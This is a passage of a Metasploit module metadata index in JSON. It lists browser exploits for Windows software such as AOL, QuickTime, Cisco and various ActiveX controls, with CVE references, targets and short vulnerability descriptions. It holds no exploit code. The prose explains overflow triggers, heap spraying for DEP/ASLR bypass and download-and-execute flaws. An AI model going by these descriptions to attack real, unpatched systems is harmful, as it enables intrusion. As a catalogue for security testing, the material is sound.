"full_name": "exploit/windows/browser/aol_ampx_convertfile",
"rank": 300,
"disclosure_date": "2009-05-19",
"type": "exploit",
"author": [
"rgod <rgod@autistici.org>",
"Trancer <mtrancer@gmail.com>"
],
"description": "This module exploits a stack-based buffer overflow in AOL IWinAmpActiveX\n class (AmpX.dll) version 2.4.0.6 installed via AOL Radio website.\n By setting an overly long value to 'ConvertFile()', an attacker can overrun\n a buffer and execute arbitrary code.",
"references": [
"OSVDB-54706",
"BID-35028",
"EDB-8733"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP0-SP3 / Windows Vista SP0-SP1 / IE 6.0 SP0-2 & IE 7.0"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/aol_ampx_convertfile.rb",
"is_install_path": true,
"ref_name": "windows/browser/aol_ampx_convertfile",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/aol_icq_downloadagent": {
"name": "America Online ICQ ActiveX Control Arbitrary File Download and Execute",
"full_name": "exploit/windows/browser/aol_icq_downloadagent",
"rank": 600,
"disclosure_date": "2006-11-06",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module allows remote attackers to download and execute arbitrary files\n on a users system via the DownloadAgent function of the ICQPhone.SipxPhoneManager ActiveX control.",
"references": [
"CVE-2006-5650",
"OSVDB-30220",
"BID-20930",
"ZDI-06-037"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/aol_icq_downloadagent.rb",
"is_install_path": true,
"ref_name": "windows/browser/aol_icq_downloadagent",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/apple_itunes_playlist": {
"name": "Apple ITunes 4.7 Playlist Buffer Overflow",
"full_name": "exploit/windows/browser/apple_itunes_playlist",
"rank": 300,
"disclosure_date": "2005-01-11",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in Apple ITunes 4.7\n build 4.7.0.42. By creating a URL link to a malicious PLS\n file, a remote attacker could overflow a buffer and execute\n arbitrary code. When using this module, be sure to set the\n URIPATH with an extension of '.pls'.",
"references": [
"CVE-2005-0043",
"OSVDB-12833",
"BID-12238"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows 2000 Pro English SP4",
"Windows XP Pro English SP2"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/apple_itunes_playlist.rb",
"is_install_path": true,
"ref_name": "windows/browser/apple_itunes_playlist",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/apple_quicktime_marshaled_punk": {
"name": "Apple QuickTime 7.6.7 _Marshaled_pUnk Code Execution",
"full_name": "exploit/windows/browser/apple_quicktime_marshaled_punk",
"rank": 500,
"disclosure_date": "2010-08-30",
"type": "exploit",
"author": [
"Ruben Santemarta",
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a memory trust issue in Apple QuickTime\n 7.6.7. When processing a specially-crafted HTML page, the QuickTime ActiveX\n control will treat a supplied parameter as a trusted pointer. It will\n then use it as a COM-type pUnknown and lead to arbitrary code execution.\n\n This exploit utilizes a combination of heap spraying and the\n QuickTimeAuthoring.qtx module to bypass DEP and ASLR. This module does not\n opt-in to ASLR. As such, this module should be reliable on all Windows\n versions.\n\n NOTE: The addresses may need to be adjusted for older versions of QuickTime.",
"references": [
"CVE-2010-1818",
"OSVDB-67705",
"URL-http://reversemode.com/index.php?option=com_content&task=view&id=69&Itemid=1"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Apple QuickTime Player 7.6.6 and 7.6.7 on Windows XP SP3"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/apple_quicktime_marshaled_punk.rb",
"is_install_path": true,
"ref_name": "windows/browser/apple_quicktime_marshaled_punk",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/apple_quicktime_mime_type": {
"name": "Apple QuickTime 7.7.2 MIME Type Buffer Overflow",
"full_name": "exploit/windows/browser/apple_quicktime_mime_type",
"rank": 300,
"disclosure_date": "2012-11-07",
"type": "exploit",
"author": [
"Pavel Polischouk",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a buffer overflow in Apple QuickTime 7.7.2. The stack\n based overflow occurs when processing a malformed Content-Type header. The module\n has been tested successfully on Safari 5.1.7 and 5.0.7 on Windows XP SP3.",
"references": [
"CVE-2012-3753",
"OSVDB-87088",
"BID-56438",
"URL-http://support.apple.com/kb/HT5581",
"URL-http://asintsov.blogspot.com.es/2012/11/heapspray.html"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"Windows XP SP3 / Safari 5.1.7 / Apple QuickTime Player 7.7.2",
"Windows XP SP3 / Safari 5.0.5 / Apple QuickTime Player 7.7.2"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/apple_quicktime_mime_type.rb",
"is_install_path": true,
"ref_name": "windows/browser/apple_quicktime_mime_type",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/apple_quicktime_rdrf": {
"name": "Apple Quicktime 7 Invalid Atom Length Buffer Overflow",
"full_name": "exploit/windows/browser/apple_quicktime_rdrf",
"rank": 300,
"disclosure_date": "2013-05-22",
"type": "exploit",
"author": [
"Jason Kratzer",
"Tom Gallagher",
"Paul Bates",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a vulnerability found in Apple Quicktime. The flaw is\n triggered when Quicktime fails to properly handle the data length for certain\n atoms such as 'rdrf' or 'dref' in the Alis record, which may result a buffer\n overflow by loading a specially crafted .mov file, and allows arbitrary\n code execution under the context of the current user.",
"references": [
"CVE-2013-1017",
"OSVDB-93625",
"BID-60097",
"URL-http://support.apple.com/kb/HT5770",
"ZDI-13-110"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Quicktime 7.7.3 with IE 8 on Windows XP SP3",
"Quicktime 7.7.2 with IE 8 on Windows XP SP3",
"Quicktime 7.7.1 with IE 8 on Windows XP SP3",
"Quicktime 7.7.0 with IE 8 on Windows XP SP3"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/apple_quicktime_rdrf.rb",
"is_install_path": true,
"ref_name": "windows/browser/apple_quicktime_rdrf",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/apple_quicktime_rtsp": {
"name": "Apple QuickTime 7.1.3 RTSP URI Buffer Overflow",
"full_name": "exploit/windows/browser/apple_quicktime_rtsp",
"rank": 300,
"disclosure_date": "2007-01-01",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>",
"egypt <egypt@metasploit.com>"
],
"description": "This module exploits a buffer overflow in Apple QuickTime\n 7.1.3. This module was inspired by MOAB-01-01-2007. The\n Browser target for this module was tested against IE 6 and\n Firefox 1.5.0.3 on Windows XP SP0/2; Firefox 3 blacklists the\n QuickTime plugin.",
"references": [
"CVE-2007-0015",
"OSVDB-31023",
"BID-21829"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"Apple QuickTime Player 7.1.3",
"Browser Universal"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/apple_quicktime_rtsp.rb",
"is_install_path": true,
"ref_name": "windows/browser/apple_quicktime_rtsp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/apple_quicktime_smil_debug": {
"name": "Apple QuickTime 7.6.6 Invalid SMIL URI Buffer Overflow",
"full_name": "exploit/windows/browser/apple_quicktime_smil_debug",
"rank": 400,
"disclosure_date": "2010-08-12",
"type": "exploit",
"author": [
"Krystian Kloskowski",
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a buffer overflow in Apple QuickTime\n 7.6.6. When processing a malformed SMIL uri, a stack-based buffer\n overflow can occur when logging an error message.",
"references": [
"CVE-2010-1799",
"OSVDB-66636",
"BID-41962",
"URL-http://secunia.com/advisories/40729/",
"URL-http://support.apple.com/kb/HT4290"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Apple QuickTime Player 7.6.6"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/apple_quicktime_smil_debug.rb",
"is_install_path": true,
"ref_name": "windows/browser/apple_quicktime_smil_debug",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/apple_quicktime_texml_font_table": {
"name": "Apple QuickTime 7.7.2 TeXML Style Element font-table Field Stack Buffer Overflow",
"full_name": "exploit/windows/browser/apple_quicktime_texml_font_table",
"rank": 300,
"disclosure_date": "2012-11-07",
"type": "exploit",
"author": [
"Arezou Hosseinzad-Amirkhizi",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a vulnerability found in Apple QuickTime. When handling\n a TeXML file, it is possible to trigger a stack-based buffer overflow, and then\n gain arbitrary code execution under the context of the user. This is due to the\n QuickTime3GPP.gtx component not handling certain Style subfields properly, as the\n font-table field, which is used to trigger the overflow in this module. Because of\n QuickTime restrictions when handling font-table fields, only 0x31-0x39 bytes can be\n used to overflow, so at the moment DEP/ASLR bypass hasn't been provided. The module\n has been tested successfully on IE6 and IE7 browsers (Windows XP and Vista).",
"references": [
"OSVDB-87087",
"CVE-2012-3752",
"BID-56557",
"URL-http://support.apple.com/kb/HT5581"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"IE 6 on Windows XP SP3",
"Firefox 3.5 on Windows XP SP3",
"Firefox 3.5.1 on Windows XP SP3"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/apple_quicktime_texml_font_table.rb",
"is_install_path": true,
"ref_name": "windows/browser/apple_quicktime_texml_font_table",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/ask_shortformat": {
"name": "Ask.com Toolbar askBar.dll ActiveX Control Buffer Overflow",
"full_name": "exploit/windows/browser/ask_shortformat",
"rank": 300,
"disclosure_date": "2007-09-24",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in Ask.com Toolbar 4.0.2.53.\n An attacker may be able to execute arbitrary code by sending an overly\n long string to the \"ShortFormat()\" method in askbar.dll.",
"references": [
"CVE-2007-5107",
"OSVDB-37735"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP0/SP1 Pro English",
"Windows 2000 Pro English ALL"
],
"mod_time": "2017-09-08 22:19:55 +0000",
"path": "/modules/exploits/windows/browser/ask_shortformat.rb",
"is_install_path": true,
"ref_name": "windows/browser/ask_shortformat",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/asus_net4switch_ipswcom": {
"name": "ASUS Net4Switch ipswcom.dll ActiveX Stack Buffer Overflow",
"full_name": "exploit/windows/browser/asus_net4switch_ipswcom",
"rank": 300,
"disclosure_date": "2012-02-17",
"type": "exploit",
"author": [
"Dmitriy Evdokimov",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a vulnerability found in ASUS Net4Switch's ipswcom.dll\n ActiveX control. A buffer overflow condition is possible in multiple places due\n to the use of the CxDbgPrint() function, which allows remote attackers to gain\n arbitrary code execution under the context of the user.",
"references": [
"CVE-2012-4924",
"OSVDB-79438",
"URL-http://dsecrg.com/pages/vul/show.php?id=417"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"IE 6 on Windows XP SP3",
"IE 7 on Windows XP SP3"
],
"mod_time": "2018-08-29 14:12:49 +0000",
"path": "/modules/exploits/windows/browser/asus_net4switch_ipswcom.rb",
"is_install_path": true,
"ref_name": "windows/browser/asus_net4switch_ipswcom",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/athocgov_completeinstallation": {
"name": "AtHocGov IWSAlerts ActiveX Control Buffer Overflow",
"full_name": "exploit/windows/browser/athocgov_completeinstallation",
"rank": 300,
"disclosure_date": "2008-02-15",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in AtHocGov IWSAlerts. When\n sending an overly long string to the CompleteInstallation() method of AtHocGovTBr.dll\n (6.1.4.36) an attacker may be able to execute arbitrary code. This\n vulnerability was silently patched by the vendor.",
"references": [
"OSVDB-94557"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/athocgov_completeinstallation.rb",
"is_install_path": true,
"ref_name": "windows/browser/athocgov_completeinstallation",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/autodesk_idrop": {
"name": "Autodesk IDrop ActiveX Control Heap Memory Corruption",
"full_name": "exploit/windows/browser/autodesk_idrop",
"rank": 300,
"disclosure_date": "2009-04-02",
"type": "exploit",
"author": [
"Elazar Broad <elazarb@earthlink.net>",
"Trancer <mtrancer@gmail.com>"
],
"description": "This module exploits a heap-based memory corruption vulnerability in\n Autodesk IDrop ActiveX control (IDrop.ocx) version 17.1.51.160.\n An attacker can execute arbitrary code by triggering a heap use after\n free condition using the Src, Background, PackageXml properties.",
"references": [
"OSVDB-53265",
"BID-34352",
"EDB-8560",
"URL-http://marc.info/?l=full-disclosure&m=123870112214736"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP0-SP3 / Windows Vista SP0-SP1 / IE 6.0 SP0-2 & IE 7.0"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/autodesk_idrop.rb",
"is_install_path": true,
"ref_name": "windows/browser/autodesk_idrop",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/aventail_epi_activex": {
"name": "SonicWALL Aventail epi.dll AuthCredential Format String",
"full_name": "exploit/windows/browser/aventail_epi_activex",
"rank": 300,
"disclosure_date": "2010-08-19",
"type": "exploit",
"author": [
"Nikolas Sotiriu",
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a format string vulnerability within version 10.0.4.x and\n 10.5.1 of the SonicWALL Aventail SSL-VPN Endpoint Interrogator/Installer ActiveX\n control (epi.dll). By calling the 'AuthCredential' method with a specially\n crafted Unicode format string, an attacker can cause memory corruption and\n execute arbitrary code.\n\n Unfortunately, it does not appear to be possible to indirectly re-use existing\n stack data for more reliable exploitation. This is due to several particulars\n about this vulnerability. First, the format string must be a Unicode string,\n which uses two bytes per character. Second, the buffer is allocated on the\n stack using the 'alloca' function. As such, each additional format specifier (%x)\n will add four more bytes to the size allocated. This results in the inability to\n move the read pointer outside of the buffer.\n\n Further testing showed that using specifiers that pop more than four bytes does\n not help. Any number of format specifiers will result in accessing the same value\n within the buffer.\n\n NOTE: It may be possible to leverage the vulnerability to leak memory contents.\n However, that has not been fully investigated at this time.",
"references": [
"OSVDB-67286",
"URL-http://sotiriu.de/adv/NSOADV-2010-005.txt"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"epi.dll v10.0.4.18 on Windows XP SP3"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/aventail_epi_activex.rb",
"is_install_path": true,
"ref_name": "windows/browser/aventail_epi_activex",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/awingsoft_web3d_bof": {
"name": "AwingSoft Winds3D Player SceneURL Buffer Overflow",
"full_name": "exploit/windows/browser/awingsoft_web3d_bof",
"rank": 200,
"disclosure_date": "2009-07-10",
"type": "exploit",
"author": [
"shinnai <shinnai@autistici.org>",
"Trancer <mtrancer@gmail.com>",
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a data segment buffer overflow within Winds3D Viewer of\n AwingSoft Awakening 3.x (WindsPly.ocx v3.6.0.0). This ActiveX is a plugin of\n AwingSoft Web3D Player.\n By setting an overly long value to the 'SceneURL' property, an attacker can\n overrun a buffer and execute arbitrary code.",
"references": [
"CVE-2009-4588",
"OSVDB-60017",
"EDB-9116",
"URL-http://www.rec-sec.com/2009/07/28/awingsoft-web3d-buffer-overflow/"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP0-SP3 / IE 6.0 SP0-2 & IE 7.0"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/awingsoft_web3d_bof.rb",
"is_install_path": true,
"ref_name": "windows/browser/awingsoft_web3d_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/awingsoft_winds3d_sceneurl": {
"name": "AwingSoft Winds3D Player 3.5 SceneURL Download and Execute",
"full_name": "exploit/windows/browser/awingsoft_winds3d_sceneurl",
"rank": 600,
"disclosure_date": "2009-11-14",
"type": "exploit",
"author": [
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits an untrusted program execution vulnerability within the\n Winds3D Player from AwingSoft. The Winds3D Player is a browser plugin for\n IE (ActiveX), Opera (DLL) and Firefox (XPI). By setting the 'SceneURL'\n parameter to the URL to an executable, an attacker can execute arbitrary\n code.\n\n Testing was conducted using plugin version 3.5.0.9 for Firefox 3.5 and\n IE 8 on Windows XP SP3.",
"references": [
"CVE-2009-4850",
"OSVDB-60049"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/awingsoft_winds3d_sceneurl.rb",
"is_install_path": true,
"ref_name": "windows/browser/awingsoft_winds3d_sceneurl",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/baofeng_storm_onbeforevideodownload": {
"name": "BaoFeng Storm mps.dll ActiveX OnBeforeVideoDownload Buffer Overflow",
"full_name": "exploit/windows/browser/baofeng_storm_onbeforevideodownload",
"rank": 300,
"disclosure_date": "2009-04-30",
"type": "exploit",
"author": [
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a buffer overflow in BaoFeng's Storm media Player ActiveX\n control. Versions of mps.dll including 3.9.4.27 and lower are affected. When passing\n an overly long string to the method \"OnBeforeVideoDownload\" an attacker can execute\n arbitrary code.",
"references": [
"CVE-2009-1612",
"OSVDB-54169",
"BID-34789",
"EDB-8579"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/baofeng_storm_onbeforevideodownload.rb",
"is_install_path": true,
"ref_name": "windows/browser/baofeng_storm_onbeforevideodownload",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/barcode_ax49": {
"name": "RKD Software BarCodeAx.dll v4.9 ActiveX Remote Stack Buffer Overflow",
"full_name": "exploit/windows/browser/barcode_ax49",
"rank": 300,
"disclosure_date": "2007-06-22",
"type": "exploit",
"author": [
"Trancek <trancek@yashira.org>",
"aushack <patrick@osisecurity.com.au>"
],
"description": "This module exploits a stack buffer overflow in RKD Software Barcode Application\n ActiveX Control 'BarCodeAx.dll'. By sending an overly long string to the BeginPrint\n method of BarCodeAx.dll v4.9, an attacker may be able to execute arbitrary code.",
"references": [
"EDB-4094",
"OSVDB-37482",
"BID-24596",
"CVE-2007-3435"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP0 English"
],
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/exploits/windows/browser/barcode_ax49.rb",
"is_install_path": true,
"ref_name": "windows/browser/barcode_ax49",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/blackice_downloadimagefileurl": {
"name": "Black Ice Cover Page ActiveX Control Arbitrary File Download",
"full_name": "exploit/windows/browser/blackice_downloadimagefileurl",
"rank": 600,
"disclosure_date": "2008-06-05",
"type": "exploit",
"author": [
"shinnai",
"mr_me <steventhomasseeley@gmail.com>",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module allows remote attackers to place arbitrary files on a users file system\n by abusing the \"DownloadImageFileURL\" method in the Black Ice BIImgFrm.ocx ActiveX\n Control (BIImgFrm.ocx 12.0.0.0). Code execution can be achieved by first uploading the\n payload to the remote machine, and then upload another mof file, which enables Windows\n Management Instrumentation service to execute the binary. Please note that this module\n currently only works for Windows before Vista. Also, a similar issue is reported in\n BIDIB.ocx (10.9.3.0) within the Barcode SDK.",
"references": [
"CVE-2008-2683",
"OSVDB-46007",
"BID-29577",
"EDB-5750"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-09-08 22:19:55 +0000",
"path": "/modules/exploits/windows/browser/blackice_downloadimagefileurl.rb",
"is_install_path": true,
"ref_name": "windows/browser/blackice_downloadimagefileurl",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/c6_messenger_downloaderactivex": {
"name": "Icona SpA C6 Messenger DownloaderActiveX Control Arbitrary File Download and Execute",
"full_name": "exploit/windows/browser/c6_messenger_downloaderactivex",
"rank": 600,
"disclosure_date": "2008-06-03",
"type": "exploit",
"author": [
"Unknown",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a vulnerability in Icona SpA C6 Messenger 1.0.0.1. The\n vulnerability is in the DownloaderActiveX Control (DownloaderActiveX.ocx). The\n insecure control can be abused to download and execute arbitrary files in the context of\n the currently logged-on user.",
"references": [
"CVE-2008-2551",
"OSVDB-45960",
"BID-29519"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/c6_messenger_downloaderactivex.rb",
"is_install_path": true,
"ref_name": "windows/browser/c6_messenger_downloaderactivex",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/ca_brightstor_addcolumn": {
"name": "CA BrightStor ARCserve Backup AddColumn() ActiveX Buffer Overflow",
"full_name": "exploit/windows/browser/ca_brightstor_addcolumn",
"rank": 300,
"disclosure_date": "2008-03-16",
"type": "exploit",
"author": [
"dean <dean@zerodaysolutions.com>"
],
"description": "The CA BrightStor ARCserve Backup ActiveX control (ListCtrl.ocx) is vulnerable to a stack-based\n buffer overflow. By passing an overly long argument to the AddColumn() method, a remote attacker\n could overflow a buffer and execute arbitrary code on the system.",
"references": [
"CVE-2008-1472",
"OSVDB-43214"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP2-SP3 IE 6.0/7.0"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/ca_brightstor_addcolumn.rb",
"is_install_path": true,
"ref_name": "windows/browser/ca_brightstor_addcolumn",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/chilkat_crypt_writefile": {
"name": "Chilkat Crypt ActiveX WriteFile Unsafe Method",
"full_name": "exploit/windows/browser/chilkat_crypt_writefile",
"rank": 600,
"disclosure_date": "2008-11-03",
"type": "exploit",
"author": [
"shinnai",
"jduck <jduck@metasploit.com>"
],
"description": "This module allows attackers to execute code via the 'WriteFile' unsafe method of\n Chilkat Software Inc's Crypt ActiveX control.\n\n This exploit is based on shinnai's exploit that uses an hcp:// protocol URI to\n execute our payload immediately. However, this method requires that the victim user\n be browsing with Administrator. Additionally, this method will not work on newer\n versions of Windows.\n\n NOTE: This vulnerability is still unpatched. The latest version of Chilkat Crypt at\n the time of this writing includes ChilkatCrypt2.DLL version 4.4.4.0.",
"references": [
"CVE-2008-5002",
"OSVDB-49510",
"BID-32073",
"EDB-6963"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/chilkat_crypt_writefile.rb",
"is_install_path": true,
"ref_name": "windows/browser/chilkat_crypt_writefile",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/cisco_anyconnect_exec": {
"name": "Cisco AnyConnect VPN Client ActiveX URL Property Download and Execute",
"full_name": "exploit/windows/browser/cisco_anyconnect_exec",
"rank": 600,
"disclosure_date": "2011-06-01",
"type": "exploit",
"author": [
"bannedit <bannedit@metasploit.com>"
],
"description": "This module exploits a vulnerability in the Cisco AnyConnect VPN client\n vpnweb.ocx ActiveX control. This control is typically used to install the\n VPN client. An attacker can set the 'url' property which is where the control\n tries to locate the files needed to install the client.\n\n The control tries to download two files from the site specified within the\n 'url' property. One of these files it will be stored in a temporary directory and\n executed.",
"references": [
"CVE-2011-2039",
"OSVDB-72714",
"URL-http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=909",
"URL-http://www.cisco.com/en/US/products/products_security_advisory09186a0080b80123.shtml"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/cisco_anyconnect_exec.rb",
"is_install_path": true,
"ref_name": "windows/browser/cisco_anyconnect_exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/cisco_playerpt_setsource": {
"name": "Cisco Linksys PlayerPT ActiveX Control Buffer Overflow",
"full_name": "exploit/windows/browser/cisco_playerpt_setsource",
"rank": 300,
"disclosure_date": "2012-03-22",
"type": "exploit",
"author": [
"rgod",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a vulnerability found in Cisco Linksys PlayerPT 1.0.0.15\n as the installed with the web interface of Cisco Linksys WVC200 Wireless-G PTZ\n Internet Video Camera. The vulnerability, due to the insecure usage of sprintf in\n the SetSource method, allows to trigger a stack based buffer overflow which leads\n to code execution under the context of the user visiting a malicious web page.",
"references": [
"CVE-2012-0284",
"OSVDB-80297",
"EDB-18641"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"IE 6 on Windows XP SP3",
"IE 7 on Windows XP SP3 / Windows Vista SP2",
"IE 8 on Windows XP SP3"
],
"mod_time": "2018-07-12 17:34:52 +0000",
"path": "/modules/exploits/windows/browser/cisco_playerpt_setsource.rb",
"is_install_path": true,
"ref_name": "windows/browser/cisco_playerpt_setsource",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/cisco_playerpt_setsource_surl": {
"name": "Cisco Linksys PlayerPT ActiveX Control SetSource sURL Argument Buffer Overflow",
"full_name": "exploit/windows/browser/cisco_playerpt_setsource_surl",
"rank": 300,
"disclosure_date": "2012-07-17",
"type": "exploit",
"author": [
"Carsten Eiram",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a vulnerability found in Cisco Linksys PlayerPT 1.0.0.15\n as the installed with the web interface of Cisco Linksys WVC200 Wireless-G PTZ\n Internet Video Camera. The vulnerability, due to the insecure usage of sprintf in\n the SetSource method, when handling a specially crafted sURL argument, allows to\n trigger a stack based buffer overflow which leads to code execution under the\n context of the user visiting a malicious web page.",
"references": [
"CVE-2012-0284",
"OSVDB-84309",
"BID-54588",
"URL-http://secunia.com/secunia_research/2012-25/"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"IE 6 on Windows XP SP3",
"IE 7 on Windows XP SP3 / Windows Vista SP2",
"IE 8 on Windows XP SP3",
"IE 8 with Java 6 on Windows XP SP3",
"IE 8 with Java 6 on Windows 7 SP1/Vista SP2",
"IE 9 with Java 6 on Windows 7 SP1"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/cisco_playerpt_setsource_surl.rb",
"is_install_path": true,
"ref_name": "windows/browser/cisco_playerpt_setsource_surl",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/cisco_webex_ext": {
"name": "Cisco WebEx Chrome Extension RCE (CVE-2017-3823)",
"full_name": "exploit/windows/browser/cisco_webex_ext",
"rank": 500,
"disclosure_date": "2017-01-21",
"type": "exploit",
"author": [
